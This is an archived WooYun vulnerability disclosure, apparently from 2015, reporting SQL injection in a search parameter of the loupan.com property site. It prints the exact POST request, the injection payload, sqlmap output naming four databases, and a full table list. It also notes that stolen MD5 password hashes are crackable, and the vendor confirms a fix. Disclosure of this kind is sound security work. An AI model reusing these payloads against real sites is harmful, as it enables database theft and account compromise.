乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-18: 厂商已经确认,细节仅向厂商公开 2015-09-28: 细节向核心白帽子及相关领域专家公开 2015-10-08: 细节向普通白帽子公开 2015-10-18: 细节向实习白帽子公开 2015-11-02: 细节向公众公开
涉及4个数据库、大量账户密码。
1、注入点2、涉及数据库3、泄露账户、密码1、POST注入点(gz\cq\sh..基本二级域名都有):
POST /index.php/house/ajax_top_search_data/?s=0.704752029851079 HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept: */*Origin: http://cq.loupan.comReferer: http://cq.loupan.com/X-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q=0.5X-Scanner: NetsparkerHost: cq.loupan.comCookie: nom=0; PHPSESSID=jhfoehk3f2j3s62lhkuugreor6; loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227110e0ec90c5ffa5d808db252953f7c7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2214.23.175.62%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+Netsparker%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1442229262%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A59554%3B%7D94fd5d129a521eea870d85fa4d96d619; loadDomain=http%3A%2F%2Fcq.loupan.com%2F; search_keyword_site_id=296Accept-Encoding: gzip, deflateContent-Length: 18Content-Type: application/x-www-form-urlencoded; charset=UTF-8kw=-1+OR+17-7%3d10
2、涉及的数据库:
Place: POSTParameter: kw Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: kw=-1 OR 17-7=10' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7868693a,0x744962577243676a784d,0x3a7263723a), NULL#---[13:56:42] [INFO] the back-end DBMS is MySQLweb server operating system: Windows NT 4.0web application technology: PHP 5.3.28back-end DBMS: MySQL 5[13:56:42] [INFO] fetching database namesavailable databases [4]:[*] haiwai[*] information_schema[*] loupan2013[*] wenda
节选的部分tables:
Database: loupan2013[132 tables]+------------------------------------+| coreseek_counter || lp_admin || lp_admin_log || lp_admin_permissions || lp_admin_roles || lp_admin_roles_permissions || lp_admin_sites || lp_ads || lp_ads_pages || lp_ads_positions || lp_ads_sites || lp_attachments || lp_broker || lp_changelog || lp_ci_sessions || lp_cities || lp_cities_price || lp_consultant || lp_contact_info || lp_customer_purchase_intention || lp_dissertation || lp_dissertation_model || lp_email_bind || lp_email_get_password || lp_email_validate || lp_fangdai_bbs || lp_feedback || lp_fenxiao_balance || lp_fenxiao_balance_application || lp_fenxiao_balance_history || lp_fenxiao_clients || lp_fenxiao_clients_disengagement || lp_fenxiao_history || lp_fenxiao_new_broker || lp_fenxiao_referrals || lp_fenxiao_referrals_history || lp_fenxiao_site_msg || lp_fenxiao_user_collect || lp_fenxiao_view || lp_fenxiao_xieyi || lp_forum || lp_friend_categories || lp_friend_link_application || lp_friend_link_investigation_cycle || lp_friend_link_investigation_error || lp_friend_links || lp_frontend_pages || lp_frontend_pages_extra || lp_group_buy || lp_group_buy_forms || lp_hlink_in_news || lp_house_correction || lp_houses || lp_houses_attributes || lp_houses_click_cache || lp_houses_comment || lp_houses_editor_comment || lp_houses_fenxiao || lp_houses_info || lp_houses_parameters || lp_houses_pic_draw || lp_houses_pic_effect || lp_houses_pic_focus || lp_houses_pic_mating || lp_houses_pic_model || lp_houses_pic_real || lp_houses_pic_traffic || lp_houses_price_history || lp_houses_prices || lp_houses_score || lp_houses_special || lp_houses_telephone_set || lp_houses_thumb_cache || lp_houses_trend || lp_hpyold2new || lp_information_gathering || lp_loan || lp_lottery || lp_lottery_type || lp_loupandai_msg || lp_loupandai_token || lp_merchants || lp_message || lp_news || lp_news_backup || lp_news_categories || lp_news_info || lp_news_keywords || lp_news_position || lp_news_position_relation || lp_notice || lp_notice_new || lp_notice_new_record || lp_sites || lp_sms || lp_sms_queue || lp_special_keywords || lp_special_keywords_comments || lp_special_keywords_old || lp_special_keywords_old_related || lp_store || lp_syn_phone_config || lp_telephone_balance || lp_telephone_cost || lp_telephone_cost_bak || lp_telephone_cost_bak201569 || lp_telephone_history || lp_telephone_queue || lp_telephone_recharge_history || lp_telephone_set_pool || lp_toupiao || lp_user_atuo_refresh_templet || lp_user_balance || lp_user_balance_history || lp_user_collect || lp_user_combo || lp_user_operation_auto_refresh || lp_user_operation_promotion || lp_user_operation_refresh || lp_user_operation_top || lp_users || lp_users_accepter || lp_users_link_accepter || lp_users_link_provider || lp_users_provider || lp_weixin || lp_weixin_member || lp_weixin_member_pio || lp_weixin_message || lp_xfbiaoqian || lp_youhui_class || lp_youhui_list |+------------------------------------+
3、泄露的账户密码:
还好,不是明文,不过在md5上面可以查到对应密码,最好还是进行提醒修改吧。
过滤参数
危害等级:高
漏洞Rank:20
确认时间:2015-09-18 14:05
已经修复,感谢您的关注,另外希望泄漏数据的图片码打厚实些。
暂无